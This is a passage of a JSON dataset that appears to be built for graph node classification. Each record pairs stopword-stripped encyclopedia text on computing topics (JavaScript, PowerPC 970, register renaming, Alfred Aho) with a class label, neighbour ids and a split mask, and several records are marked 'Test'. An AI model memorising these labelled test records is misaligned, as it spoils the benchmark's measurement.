explorer firefox comprehensive set developer tools includes debugger well old versions firefox without tools used firefox addon called firebug older venkman debugger webkit web inspector includes javascript debugger used safari modified version called blink devtools used google chrome node.js node inspector interactive debugger integrates blink devtools opera includes set tools called dragonfly addition native computer software online javascript integrated development environment ides debugging aids written javascript built run web example program jslint developed douglas crockford written extensively language jslint scans javascript code conformance set standards guidelines many libraries javascript three.js provide links demonstration code edited users demonstration codes also used pedagogical tool institutions khan academy allow students experience writing code environment see output programs without needing setup beyond web browser javascript increased usage web development warrants considerations performance frontend code inherited many responsibilities previously handled backend mobile devices particular may encounter problems rendering poorly optimized frontend code library benchmarks benchmark.js benchmarking library supports high-resolution timers returns statistically significant results another tool jsben.ch online javascript benchmarking tool code snippets tested javascript initially developed 1996 use netscape navigator web browser year microsoft released implementation internet explorer implementation called jscript due trademark issues 1997 first standardized version language released name ecmascript first edition ecma-262 standard explicit versioning opt-in language features mozilla-specific removed later firefox versions least firefox 59 firefox 4 last version referred explicit javascript version 1.8.5 new editions ecma-262 standard javascript language features often mentioned initial definition ecma-262 editions following table explicitly versioned javascript versions based information multiple sources javascript widely supported client-side language run within web browser become intermediate language languages also called transpilers target included newly created languages ports existing languages include javascript unusual limitations – explicit integer type double-precision binary floating point – languages compile javascript take care use integer-converting shift bitwise logical operators may slightly different behavior environments common misconception javascript similar closely related java true c-like syntax c language immediate common ancestor language also typically sandboxed used inside browser javascript designed java syntax standard library mind particular java keywords reserved original javascript javascript standard library follows java naming conventions javascript objects based classes java 1.0 similarities end java javascript first appeared 1995 java developed james gosling sun microsystems javascript brendan eich netscape communications differences two languages prominent similarities java static typing javascript typing dynamic java loaded compiled bytecode javascript loaded human-readable source code java objects class-based javascript prototype-based finally java support functional programming java 8 javascript done beginning influenced scheme starting 2017 web browsers began supporting webassembly technology standardized w3c webassembly standard specifies binary format produced compiler toolchain llvm execute browser near native speed webassembly allows programming languages c c++ c java used well javascript author client-side code world wide web",
    "neighbors": [
      8195,
      4103,
      6154,
      11,
      4111,
      6160,
      19,
      2069,
      8213,
      24,
      10266,
      6171,
      2076,
      6176,
      2081,
      10284,
      46,
      6191,
      2108,
      64,
      65,
      6209,
      8262,
      2119,
      72,
      4171,
      84,
      6228,
      6231,
      8281,
      2139,
      8283,
      10332,
      8289,
      8291,
      102,
      103,
      4198,
      4200,
      8296,
      107,
      8297,
      10345,
      8303,
      8304,
      10353,
      115,
      119,
      124,
      8316,
      2182,
      2187,
      6285,
      10387,
      148,
      10392,
      155,
      8351,
      2217,
      10410,
      10412,
      10413,
      2224,
      4272,
      10419,
      185,
      4284,
      190,
      8384,
      8385,
      6338,
      10447,
      10450,
      2259,
      214,
      4310,
      6361,
      219,
      8413,
      225,
      228,
      4326,
      231,
      10470,
      8425,
      6385,
      2298,
      8443,
      6398,
      2304,
      4352,
      8448,
      259,
      263,
      8455,
      10506,
      10507,
      10510,
      8467,
      278,
      8473,
      4378,
      8476,
      10526,
      8479,
      10555,
      8520,
      10569,
      8524,
      337,
      338,
      339,
      10581,
      4439,
      10584,
      8539,
      349,
      6493,
      2401,
      6500,
      8549,
      6502,
      10601,
      362,
      8554,
      364,
      8557,
      10604,
      4470,
      380,
      2432,
      6528,
      4482,
      10624,
      4485,
      4486,
      8582,
      8584,
      8588,
      4507,
      6555,
      8605,
      10654,
      2470,
      8616,
      8618,
      428,
      10670,
      6576,
      2481,
      4529,
      8626,
      8627,
      438,
      8639,
      2496,
      8640,
      8644,
      4550,
      463,
      10703,
      467,
      2519,
      477,
      479,
      10719,
      482,
      10722,
      487,
      4584,
      494,
      10736,
      8691,
      2548,
      10739,
      502,
      10744,
      4604,
      2557,
      2556,
      8702,
      10752,
      513,
      6657,
      515,
      10756,
      522,
      4623,
      2576,
      8720,
      2579,
      534,
      8728,
      2585,
      8735,
      544,
      8739,
      10791,
      2603,
      559,
      2611,
      2613,
      4661,
      10808,
      574,
      6718,
      8771,
      10819,
      2636,
      10834,
      595,
      10841,
      603,
      6747,
      607,
      8799,
      2658,
      10854,
      2666,
      6762,
      4728,
      637,
      6791,
      4746,
      6797,
      655,
      6800,
      10900,
      8854,
      8858,
      10910,
      10915,
      679,
      4775,
      4777,
      6828,
      10927,
      8883,
      692,
      4797,
      8916,
      4822,
      727,
      2777,
      6875,
      8923,
      735,
      737,
      741,
      6886,
      4840,
      8939,
      4844,
      10991,
      10995,
      764,
      8956,
      6912,
      788,
      2836,
      790,
      6938,
      4893,
      6941,
      8990,
      11038,
      803,
      2853,
      806,
      6951,
      4911,
      2865,
      11060,
      4917,
      4920,
      2880,
      9029,
      11082,
      2893,
      847,
      11087,
      9046,
      2903,
      11098,
      862,
      9063,
      4972,
      9078,
      2946,
      899,
      9096,
      9097,
      916,
      5012,
      929,
      2977,
      5026,
      7076,
      934,
      5031,
      9128,
      2990,
      944,
      5040,
      9138,
      11186,
      5048,
      5050,
      5054,
      9152,
      7106,
      963,
      5059,
      970,
      5067,
      11219,
      11221,
      5078,
      9181,
      11230,
      9183,
      9185,
      9193,
      7147,
      9195,
      5101,
      7152,
      1016,
      5114,
      1019,
      9211,
      11259,
      5123,
      9224,
      11284,
      1051,
      3099,
      9245,
      3102,
      11303,
      7212,
      5165,
      1077,
      3126,
      11319,
      5176,
      9275,
      1095,
      5198,
      5199,
      11357,
      5214,
      7262,
      9311,
      5219,
      1130,
      7274,
      11372,
      9330,
      7292,
      7293,
      9345,
      5251,
      1156,
      5255,
      11403,
      5264,
      11418,
      3229,
      7326,
      5281,
      11434,
      7340,
      9394,
      1203,
      9395,
      11449,
      5311,
      3270,
      11466,
      7372,
      11469,
      9424,
      3286,
      9437,
      11488,
      7395,
      7396,
      9448,
      9454,
      3313,
      11506,
      9464,
      7422,
      9476,
      1295,
      9487,
      11537,
      5395,
      9491,
      1302,
      7455,
      5413,
      1343,
      5442,
      1347,
      1348,
      11588,
      1353,
      3407,
      3412,
      9557,
      9560,
      9561,
      11610,
      7515,
      1379,
      5477,
      11625,
      3434,
      5483,
      9579,
      7533,
      3438,
      9580,
      9584,
      3442,
      7547,
      1409,
      3462,
      5510,
      3466,
      5515,
      9614,
      7567,
      5521,
      7571,
      5524,
      1429,
      7572,
      1435,
      9631,
      5536,
      5537,
      11683,
      5543,
      5546,
      9642,
      7601,
      3508,
      7612,
      1470,
      9665,
      1474,
      9666,
      9671,
      7627,
      7629,
      5588,
      3542,
      5592,
      7644,
      5597,
      3555,
      5605,
      9701,
      1514,
      7659,
      5612,
      3565,
      1520,
      9714,
      7669,
      5622,
      9727,
      5635,
      9736,
      3594,
      3603,
      7708,
      9757,
      5663,
      7713,
      3626,
      9770,
      5677,
      5679,
      5681,
      5684,
      9780,
      7734,
      1591,
      3639,
      9783,
      3642,
      3643,
      5707,
      5708,
      9808,
      3667,
      1623,
      7768,
      3676,
      5724,
      1632,
      3683,
      9828,
      7785,
      1642,
      3691,
      9834,
      5743,
      9841,
      9843,
      9848,
      3705,
      5754,
      1664,
      1666,
      9859,
      1673,
      7822,
      9871,
      3733,
      5783,
      3743,
      5791,
      1698,
      7851,
      1713,
      3761,
      7857,
      9908,
      7861,
      3767,
      5816,
      5819,
      7871,
      5827,
      1732,
      5833,
      7885,
      7889,
      7893,
      5846,
      7894,
      9960,
      9964,
      5869,
      5875,
      3830,
      3833,
      9987,
      7943,
      3848,
      5896,
      1802,
      1812,
      1813,
      1817,
      3867,
      5917,
      7965,
      5920,
      5921,
      3876,
      3877,
      3881,
      1834,
      10026,
      7987,
      3899,
      10043,
      10053,
      1863,
      5961,
      10057,
      3918,
      3921,
      10071,
      3939,
      10083,
      10097,
      3956,
      1910,
      1911,
      3960,
      8057,
      8059,
      1920,
      6016,
      3971,
      8068,
      1925,
      3978,
      1931,
      10125,
      6034,
      8082,
      8084,
      3991,
      1952,
      8101,
      1959,
      4011,
      6062,
      1968,
      1970,
      8116,
      6074,
      10173,
      6086,
      4042,
      4048,
      2004,
      6102,
      4056,
      4057,
      2010,
      2011,
      4069,
      6119,
      8169,
      8171,
      10219,
      10221,
      8179,
      6133,
      6134,
      8183,
      2045,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 3463,
    "label": 2,
    "text": "Windows_Home_Server_2011:windows home server 2011 windows home server 2011 code named vail home server operating system microsoft designed small office/home offices homes multiple connected pcs offer protected file storage file sharing automated pc backup remote access remote control pc desktops released 6 april 2011 following release power pack 3 aging predecessor windows home server windows home server 2011 last windows home server release succeeded windows server 2012 essentials windows home server 2011 based windows server 2008 r2 windows 7 requires x86-64 cpus 64-bit predecessor worked older ia-32 32-bit architecture well coupled fundamental changes structure client backups shared folders clear method migrating previous version windows home server 2011 windows home server 2011 includes additional entertainment capabilities 'add feature app store including web-based media functionality initial speculation technology columnist mary jo foley fueled idea 'vail would integrate windows media center prompted response time tell microsoft windows home server product planner todd headrick time public beta microsoft decided integrate windows media center 'vail 23 november 2010 microsoft announced drive extender would removed windows home server 2011 announcement led astonishment outrage testers users criticism drive extender removal mainly related seen core feature windows home server key reason adoption windows home server 2011 developer michael leworthy expressed concern implementation drive extender might lead data error issues result third-party products entered market fill void left drive extender including drive bender division drivepool stablebit volume spanning feature drive extender two drives used one large storage volume available using dynamic disks feature windows server release",
    "neighbors": [
      8576,
      641,
      2179,
      5380,
      651,
      6797,
      8080,
      3857,
      7057,
      6675,
      2196,
      8976,
      10896,
      11283,
      4505,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      7983,
      3250,
      3890,
      9910,
      9655,
      2107,
      6462,
      7615,
      321,
      7106,
      9025,
      582,
      1098,
      10957,
      3535,
      9173,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      5600,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      5356,
      9448,
      10989,
      5103,
      5363,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 3464,
    "label": 3,
    "text": "Socket_G34:socket g34 socket g34 land grid array cpu socket designed amd support amd multi-chip module opteron 6000-series server processors g34 launched march 29 2010 alongside initial grouping opteron 6100 processors designed socket g34 supports four ddr3 sdram channels two die 1944 pin cpu package socket g34 available four-socket arrangements change socket f cpus supporting eight-socket arrangements however four socket g34 cpus eight dies identical eight socket f cpus amd declined extend socket g34 eight-way operation citing shrinking demand 4-socket market amd targeting socket g34 high-end two-socket market four-socket market lower-end two-socket market serviced monolithic-die socket c32 cpus half core count equivalent socket g34 cpus socket g34 originally started socket g3 used g3mx expand memory capacity socket g3 g3mx canceled altogether replaced socket g34 socket g34 introduced march 2010 k10-based 8-core 12-core magny-cours opteron 6100 series cpus socket g34 also supports bulldozer-based 4-core 8-core 12-core 16-core opteron 6200 interlagos cpus piledriver-based 4-core 8-core 12-core 16-core opteron 6300 abu dhabi cpus",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      4872,
      7058,
      10260,
      7963,
      4767,
      2463,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      8004,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 3465,
    "label": 2,
    "text": "Fdm_(software):fdm software fdm fetch/filter deliver mail mail delivery agent email filtering software unix-like operating systems similar fetchmail procmail started 2006 developer later also started tmux 2007. fdm available package many unix-like operating systems included openbsd ports since 2007-01-18 2014 last maintainer procmail posted message openbsd mailing list suggesting remove procmail port suggested well-known openbsd ports maintainer fdm natural alternative procmail port however removed remains place 2019 fdm listed openbsd innovations page section projects maintained openbsd developers outside openbsd",
    "neighbors": [
      1664,
      9986,
      9223,
      10631,
      2825,
      1932,
      274,
      9747,
      788,
      5397,
      7702,
      10105,
      11418,
      9642,
      6702,
      7983,
      9520,
      1075,
      2101,
      9909,
      2245,
      3015,
      1993,
      8778,
      5067,
      3404,
      10956,
      11086,
      5970,
      6231,
      7255,
      5084,
      9053,
      7139,
      1637,
      4071,
      8954,
      9451,
      10861,
      5230,
      10866,
      9459,
      5492,
      1785,
      3578,
      8443,
      7036,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3466,
    "label": 7,
    "text": "XOS_Webtop:xos webtop xos webtop open source webtop os mainly written html5 php javascript xos includes desktop mobile environment features applications system utilities features continuously added accessible windows mac linux ios apple android operating system web browser first version xos webtop started development december 2010 later became available may 14 2011 several months development initial webtop work entirely planned xproduct posted version xos 2.0 desktop edition online public use quickly went back development work would later become xos webtop 3.0 development version follow version 2.0 first started beta testing version release xos 2.0 desktop edition beta reworked ground become entirely new version xos early july beta xos webtop 3.0 came soon xos webtop seen webtop catching market first development updates version fast-paced point rushed resulted sub-par experience many problems continued development desktop edition xos version 3.0 mobile version also released name xos 3.0 mobile continued tested developed well january 5 2012 xproduct released newest version xos desktop edition version 3.1 version includes heavily updated interface fix bugs glitches occurring version 3.0 well slightly improved setup additional features updated mobile edition also version 3.1 released coincide release version 3.1 desktop edition featuring updated interface design previous version version 3.1 first version webtop utilize xproduct new server website updated new domain xproduct.net upon release version 3.1 development cancelled original programmer however code open-sourced development includes fixing bugs uploading fixes soon possible testing make sure program works properly secure unlike earlier versions desktop edition xproduct releasing updates unless actually work tested tablet version xos works add desktop mobile platforms developer page available xos webtop website interested development",
    "neighbors": [
      8644,
      3462,
      1802,
      5612,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3467,
    "label": 3,
    "text": "NXP_ColdFire:nxp coldfire nxp coldfire microprocessor derives motorola 68000 family architecture manufactured embedded systems development nxp semiconductors formerly manufactured freescale semiconductor formerly semiconductor division motorola merged nxp 2015 coldfire instruction set assembly source compatible means translation software available vendor entirely object code compatible 68000 compared classic 68k hardware instruction set differs mainly longer support binary-coded decimal bcd packed data format removes number less used instructions instructions kept support fewer addressing modes also floating point intermediates 64 bits 80 bits 68881 68882 coprocessors instructions 16 32 48 bits long simplification compared 68000 series february 1999 μclinux project linux kernel ported two coldfire processors mcf5206 mcf5307 2006 debian project looking making m68k port compatible coldfires coldfire models clocked high 300 mhz much faster 68060 officially reach 75 mhz overclocked 110 mhz stallion technologies epipe secure computing snapgear security appliances arcturus networks system module products based coldfire processors coldfire linux-based single-board computers sbc ethernet compactflash small 23×55 mm 45×45 mm based compactflash 37×43 mm coldfire based products even deployed international space station electronic nose project five generations versions coldfire available freescale also fido 1100 microcontroller launched 2007 aimed predictable embedded control systems industrial ethernet applications using 68k/cpu32 instruction set however fido unique architecture shares instruction set 68k november 2006 freescale announced coldfire microprocessor cores available license semiconductor intellectual property ip licensing support partner ipextreme inc. coldfire v1 core available free license per use royalty altera cyclone-iii fpga september 2007 freescale launched 32-bit flexis microcontroller family coldfire cpu core june 2010 freescale announced coldfire+ line coldfire v1 core using 90 nm tfs technology 2010 freescale also launched kinetis arm-based product line leading industry observers speculate future coldfire range given freescale would several competing cpu ranges",
    "neighbors": [
      7170,
      7299,
      3844,
      4868,
      1158,
      7302,
      10501,
      7305,
      3467,
      1548,
      6925,
      6415,
      1170,
      7445,
      2073,
      7065,
      7452,
      6815,
      4773,
      6821,
      8102,
      9638,
      682,
      2224,
      5297,
      11314,
      1461,
      823,
      11447,
      8761,
      6715,
      1983,
      6207,
      10945,
      7235,
      9928,
      3017,
      8268,
      6607,
      336,
      8530,
      3540,
      9685,
      4569,
      9817,
      3932,
      3936,
      5220,
      7269,
      9964,
      11374,
      1776,
      3185,
      8048,
      5235,
      10224,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 3468,
    "label": 9,
    "text": "Alfred_Aho:alfred aho alfred vaino aho born august 9 1941 canadian computer scientist best known work programming languages compilers related algorithms textbooks art science computer programming aho received b.a.sc engineering physics university toronto ph.d. electrical engineering/computer science princeton university conducted research bell labs 1967 1991 1997 2002 vice president computing sciences research center holds lawrence gussman chair computer science columbia university served chair department 1995 1997 spring 2003 phd thesis aho created indexed grammars nested-stack automaton vehicles extending power context-free languages retaining many decidability closure properties indexed grammars used model parallel rewriting systems particularly biological applications graduating princeton aho joined computing sciences research center bell labs devised efficient regular expression string-pattern matching algorithms implemented first versions unix tools codice_1 codice_2 codice_2 algorithm become known aho-corasick algorithm used several bibliographic search-systems including one developed margaret j. corasick string-searching applications bell labs aho worked closely steve johnson jeffrey ullman develop efficient algorithms analyzing translating programming languages steve johnson used bottom-up lalr parsing algorithms create syntax-analyzer generator yacc michael e. lesk eric schmidt used aho regular-expression pattern-matching algorithms create lexical-analyzer generator lex lex yacc tools derivatives used develop front ends many today programming language compilers aho ullman wrote series textbooks compiling techniques codified theory relevant compiler design 1977 textbook principles compiler design green dragon front cover became known green dragon book 1986 aho ullman joined ravi sethi create new edition red dragon book briefly shown 1995 movie hackers 2007 also monica lam create purple dragon book dragon books widely used compiler textbooks throughout world 1974 aho john hopcroft ullman wrote design analysis computer algorithms codifying early research algorithms book became one highly cited books computer science several decades helped stimulate creation algorithms data structures central course computer science curriculum aho also widely known co-authorship awk programming language peter j. weinberger brian kernighan stands aho aho research interests include programming languages compilers algorithms quantum computing part language compilers research-group columbia university overall works cited 81,040 times h-index 66 may 8 2019 aho received many prestigious honors including ieee john von neumann medal membership national academy engineering elected fellow american academy arts sciences 2003 holds honorary doctorates university waterloo university helsinki university toronto fellow american association advancement science acm bell labs ieee aho twice served chair advisory committee computer information science engineering directorate national science foundation past president acm special interest group algorithms computability theory aho taught columbia university city new york since 1995 great teacher award society columbia graduates 2003",
    "neighbors": [
      1952,
      6304,
      10881,
      515,
      8037,
      8262,
      11014,
      5418,
      9002,
      2316,
      1360,
      5492,
      1783,
      5464
    ],
    "mask": "Test"
  },
  {
    "node_id": 3469,
    "label": 9,
    "text": "Adobe_ColdFusion_Builder:adobe coldfusion builder adobe coldfusion builder name adobe eclipse-based development ide used build applications coldfusion product original codename bolt reference original lightning icon coldfusion allaire days 2010 adobe released product officially renamed adobe coldfusion builder often referred cfbuilder coldfusion builder became available march 22 2010 along flash builder 4 features include coldfusion builder 2.0 codename storm confirmed previewed adobe max 2010 adobe major features include improved code navigation searching improvements code formatting automatic method stub creation product officially released may 3 2011 new features coldfusion builder 3.0 codename thunder officially released april 29 2014 new features coldfusion builder 2016 3.1.3.300344 officially released february 16 2016",
    "neighbors": [
      6797,
      9618,
      148,
      4507,
      11291,
      4512,
      8739,
      7983,
      4529,
      8627,
      8628,
      7862,
      3895,
      5048,
      9144,
      576,
      5314,
      9666,
      11237,
      102,
      10097
    ],
    "mask": "Test"
  },
  {
    "node_id": 3470,
    "label": 3,
    "text": "Register_renaming:register renaming computer architecture register renaming technique abstracts logical registers physical registers every logical register set physical registers associated programmer assembly language refers instance logical register codice_1 processor transposes name one specific physical register fly physical registers opaque referenced directly via canonical names technique used eliminate false data dependencies arising reuse registers successive instructions real data dependencies elimination false data dependencies reveals instruction-level parallelism instruction stream exploited various complementary techniques superscalar out-of-order execution better performance register machine programs composed instructions operate values instructions must name values order distinguish one another typical instruction might say “ add formula_1 formula_2 put result formula_3 ” instruction formula_1 formula_2 formula_3 names storage locations order compact instruction encoding processor instruction sets small set special locations referred special names registers example x86 instruction set architecture 8 integer registers x86-64 16 many riscs 32 ia-64 128 smaller processors names locations correspond directly elements register file different instructions may take different amounts time example processor may able execute hundreds instructions single load main memory progress shorter instructions executed load outstanding finish first thus instructions finishing original program order out-of-order execution used recent high-performance cpus achieve speed gains consider piece code running out-of-order cpu instructions final three lines independent first three instructions processor finish r1 ≔ 2048 preceding 1032 ≔ r1 done otherwise would write wrong value restriction eliminated changing names registers last three instruction executed parallel first three program run faster obliterating stalling due false data dependency many high-performance cpus implement renaming hardware achieve additional parallelism targets without appropriate data-flow detection good compilers would detect independent instruction sequences choose different registers code generation one instruction references particular location operand either reading input writing output executing instructions order different original program order lead three kinds data hazards instead delaying write reads completed two copies location maintained old value new value reads precede program order write new value provided old value even reads follow write provided new value false dependency broken additional opportunities out-of-order execution created reads need old value satisfied discarded essential concept behind register renaming anything read written renamed general-purpose floating-point registers discussed flag status registers even individual status bits commonly renamed well memory locations also renamed although commonly done extent practiced register renaming transmeta crusoe processor gated store buffer form memory renaming programs refrained reusing registers immediately would need register renaming instruction sets e.g. ia-64 specify large numbers registers specifically reason however limitations approach code size increases important program code larger instruction cache misses often processor stalls waiting new instructions machine language programs specify reads writes limited set registers specified instruction set architecture isa instance alpha isa specifies 32 integer registers 64 bits wide 32 floating-point registers 64 bits wide architectural registers programs written processors running alpha instruction set specify operations reading writing 64 registers programmer stops program debugger observe contents 64 registers status registers determine progress machine one particular processor implements isa alpha 21264 80 integer 72 floating-point physical registers alpha 21264 chip 80 physically separate locations store results integer operations 72 locations store results floating point operations following text describes two styles register renaming distinguished circuit holds data ready execution unit renaming schemes machine converts architectural registers referenced instruction stream tags architectural registers might specified 3 5 bits tags usually 6 8 bit number rename file must read port every input every instruction renamed every cycle write port every output every instruction renamed every cycle size register file generally grows square number ports rename file usually physically large consumes significant power tag-indexed register file style one large register file data values containing one register every tag example machine 80 physical registers would use 7 bit tags 48 possible tag values case unused style instruction issued execution unit tags source registers sent physical register file values corresponding tags read sent execution unit reservation station style many small associative register files usually one inputs execution unit operand instruction issue queue place value one register files style instruction issued execution unit register file entries corresponding issue queue entry read forwarded execution unit reorder buffers data-less data-ful willamette rob rob entries point registers physical register file prf also contain book keeping also first order design done andy glew illinois harrm p6 rob rob entries contain data separate prf data values rob copied rob rrf retirement one small detail temporal locality rob entries i.e. instructions close together von neumann instruction sequence write back close together time may possible perform write combining rob entries fewer ports separate rob/prf would clear makes difference since prf banked robs usually n't associative logic certainly none robs designed andy glew cams keith diefendorff insisted robs complex associative logic many years first rob proposal may cams renaming style used mips r10000 alpha 21264 fp section amd athlon renaming stage every architectural register referenced read write looked architecturally-indexed remap file file returns tag ready bit tag non-ready queued instruction write yet executed read operands tag takes place architectural register instruction every register write new tag pulled free tag fifo new mapping written remap file future instructions reading architectural register refer new tag tag marked unready instruction yet executed previous physical register allocated architectural register saved instruction reorder buffer fifo holds instructions program order decode graduation stages instructions placed various issue queues instructions executed tags results broadcast issue queues match tags tags non-ready source operands match means operand ready remap file also matches tags mark corresponding physical registers ready operands instruction issue queue ready instruction ready issue issue queues pick ready instructions send various functional units cycle non-ready instructions stay issue queues unordered removal instructions issue queues make large power-consuming issued instructions read tag-indexed physical register file bypassing just-broadcast operands execute execution results written tag-indexed physical register file well broadcast bypass network preceding functional unit graduation puts previous tag written architectural register free queue reused newly decoded instruction exception branch misprediction causes remap file back remap state last valid instruction via combination state snapshots cycling previous tags in-order pre-graduation queue since mechanism required since recover remap state state instruction currently graduated branch mispredictions handled branch reaches graduation potentially hiding branch misprediction latency style used integer section amd k7 k8 designs renaming stage every architectural register referenced reads looked architecturally-indexed future file rename file future file read gives value register outstanding instruction yet write i.e. ready instruction placed issue queue values read future file written corresponding entries reservation stations register writes instruction cause new non-ready tag written rename file tag number usually serially allocated instruction order—no free tag fifo necessary tag-indexed scheme issue queues wait non-ready operands see matching tag broadcasts unlike tag-indexed scheme matching tags cause corresponding broadcast value written issue queue entry reservation station issued instructions read arguments reservation station bypass just-broadcast operands execute mentioned earlier reservation station register files usually small perhaps eight entries execution results written reorder buffer reservation stations issue queue entry matching tag future file last instruction target architectural register case register marked ready graduation copies value reorder buffer architectural register file sole use architectural register file recover exceptions branch mispredictions exceptions branch mispredictions recognized graduation cause architectural file copied future file registers marked ready rename file usually way reconstruct state future file instruction intermediate decode graduation usually way early recovery branch mispredictions schemes instructions inserted in-order issue queues removed out-of-order queues collapse empty slots either many unused entries require sort variable priority encoding multiple instructions simultaneously ready go queues collapse holes simpler priority encoding require simple large circuitry advance instructions queue reservation stations better latency rename execute rename stage finds register values directly rather finding physical register number using find value latency shows component branch misprediction latency reservation stations also better latency instruction issue execution local register file smaller large central file tag-indexed scheme tag generation exception processing also simpler reservation station scheme discussed physical register files used reservation stations usually collapse unused entries parallel issue queue serve makes register files larger aggregate consume power complicated simpler register files used tag-indexed scheme worse yet every entry reservation station written every result bus reservation-station machine e.g. 8 issue queue entries per functional unit typically 9 times many bypass networks equivalent tag-indexed machine consequently result forwarding consumes much power area tag-indexed design furthermore reservation station scheme four places future file reservation station reorder buffer architectural file result value stored whereas tag-indexed scheme one physical register file results functional units broadcast storage locations must reach much larger number locations machine tag-indexed scheme function consumes power area time still machines equipped accurate branch prediction schemes execute latencies major concern reservation stations work remarkably well ibm system/360 model 91 early machine supported out-of-order execution instructions used tomasulo algorithm uses register renaming power1 first microprocessor used register renaming out-of-order execution 1990 original r10000 design neither collapsing issue queues variable priority encoding suffered starvation problems result—the oldest instruction queue would sometimes issued instruction decode stopped completely lack rename registers every instruction issued later revisions design starting r12000 used partially variable priority encoder mitigate problem early out-of-order machines separate renaming rob/prf storage functions matter earliest sohi ruu metaflow dcaf combined scheduling renaming storage structure modern machines renaming ram indexing map table logical register number e.g. p6 future files data storage structure however earlier machines used content-addressable memory cam renamer e.g. hpsm rat register alias table essentially used cam logical register number combination different versions register many ways story out-of-order microarchitecture cams progressively eliminated small cams useful large cams impractical p6 microarchitecture first microarchitecture intel implement out-of-order execution register renaming p6 microarchitecture used pentium pro pentium ii pentium iii pentium core core 2 microprocessors cyrix m1 released october 2 1995 first x86 processor use register renaming out-of-order execution x86 processors nexgen nx686 amd k5 released 1996 also featured register renaming out-of-order execution risc μ-operations rather native x86 instructions",
    "neighbors": [
      7173,
      9739,
      528,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      6247,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      2708,
      6804,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      1725,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      5356,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      3421,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      5518,
      8590,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      7598,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      7631,
      466,
      473,
      1499,
      477,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      1005,
      10734,
      6639,
      499,
      4596,
      10746,
      508,
      3071
    ],
    "mask": "None"
  },
  {
    "node_id": 3471,
    "label": 2,
    "text": "Merge_Module:merge module merge module special kind windows installer database contains components needed install discrete software bundle merge module installed alone must merged standard windows installer installation creation installation typically merge module collection merge modules related dependencies installs software product portion product runtime purpose merge modules let add self-contained software modules multiple installations example number applications require specifically configured component would possible create merge module installs configures component merge module could added installation packages product required particular component saves effort individually add necessary files registry entries components every installation also saves time updates needed instead updating installations applications merge module updated installations need rebuilt standard merge modules .msm file extension merge modules may configurable merge modules merge modules contain certain values set specify module behaves installation example author configurable merge module may allow attributes set components enable disable isolated components specify bitmap dialog specify custom action run configurable merge modules supported windows installer 2.0 higher exist number pre-created merge modules install commonly used microsoft software packages mdac activex controls mfc sapi dcom",
    "neighbors": [
      10024,
      10026,
      6797,
      4174,
      214,
      10654
    ],
    "mask": "Test"
  },
  {
    "node_id": 3472,
    "label": 3,
    "text": "PowerPC_970:powerpc 970 powerpc 970 powerpc 970fx powerpc 970gx powerpc 970mp 64-bit powerpc processors ibm introduced 2002 used powerpc-based macintosh computers apple referred powerpc g5 970 family created collaboration ibm apple project went codename gp-ul giga processor ultra light giga processor codename power4 core derived apple introduced power mac g5 stated five-year collaborative effort multiple future generations short-lived apple retract promise deliver 3 ghz processor one year introduction ibm could never get power consumption far enough processors fit portable computer apple used three variants processor ibm ’ js20/js21 blade modules low-end workstations system p servers based powerpc 970 also used high end embedded systems like mercury ’ momentum xsa-200 ibm also licensing powerpc 970 core use custom applications powerpc 970 single core derivative power4 process 32-bit 64-bit powerpc instructions natively hardware prefetch unit three way branch prediction unit like power4 front-end nine stages long powerpc 970 fetch decode eight instructions dispatch five reserve stations issue eight execution units retire five per cycle execution pipelines lengthened compared power4 achieve higher clock frequencies eight execution units two arithmetic logic units alus two double precision floating-point units two load/store units two altivec units one altivec units executes integer floating-point instructions permute instructions latter three subunits simple integer complex integer floating-point instructions units pipelines varying lengths 10 stages simple integer permute instructions 13 stages complex integer instructions 16 stage floating-point instructions processor two unidirectional 32-bit double data rate ddr buses one reads writes system controller chip northbridge running one quarter processor core speed buses also carry addresses control signals addition data percentage peak bandwidth realized 6.4 gb/s 450 mhz buses unidirectional direction realize half aggregate bandwidth 3.2 gb/s powerpc 970 announced ibm october 2002 released apple computer power mac g5 june 2003 keeping previous naming conventions apple termed powerpc 970 based products g5 fifth generation powerpc microprocessors ibm released first powerpc 970 blade servers bladecenter js20 november 2003 powerpc 970 512 kb full-speed l2 cache clock speeds 1.6 2.0 ghz front side bus ran half processor clock speed powerpc 970fx used 90 nm manufacturing process maximum power rating 11 watts 149 degrees fahrenheit 65 °c clocked 1 ghz maximum 48 watts 2 ghz powerpc 970 pipeline lengthened 9 stages 16 21 stages powerpc 970 fx 10 functional units 2 fixed-point units 2 load/store units 2 floating point units 1 branch unit 1 simd alu unit 1 simd permute unit 1 condition register supports 215 instructions in-flight 16 instruction fetch unit 67 instruction decode unit 100 functional units 32 store queue 64 kbytes directly-mapped instruction cache 32 kbytes d-cache apple released 970fx-powered machines throughout 2004 xserve g5 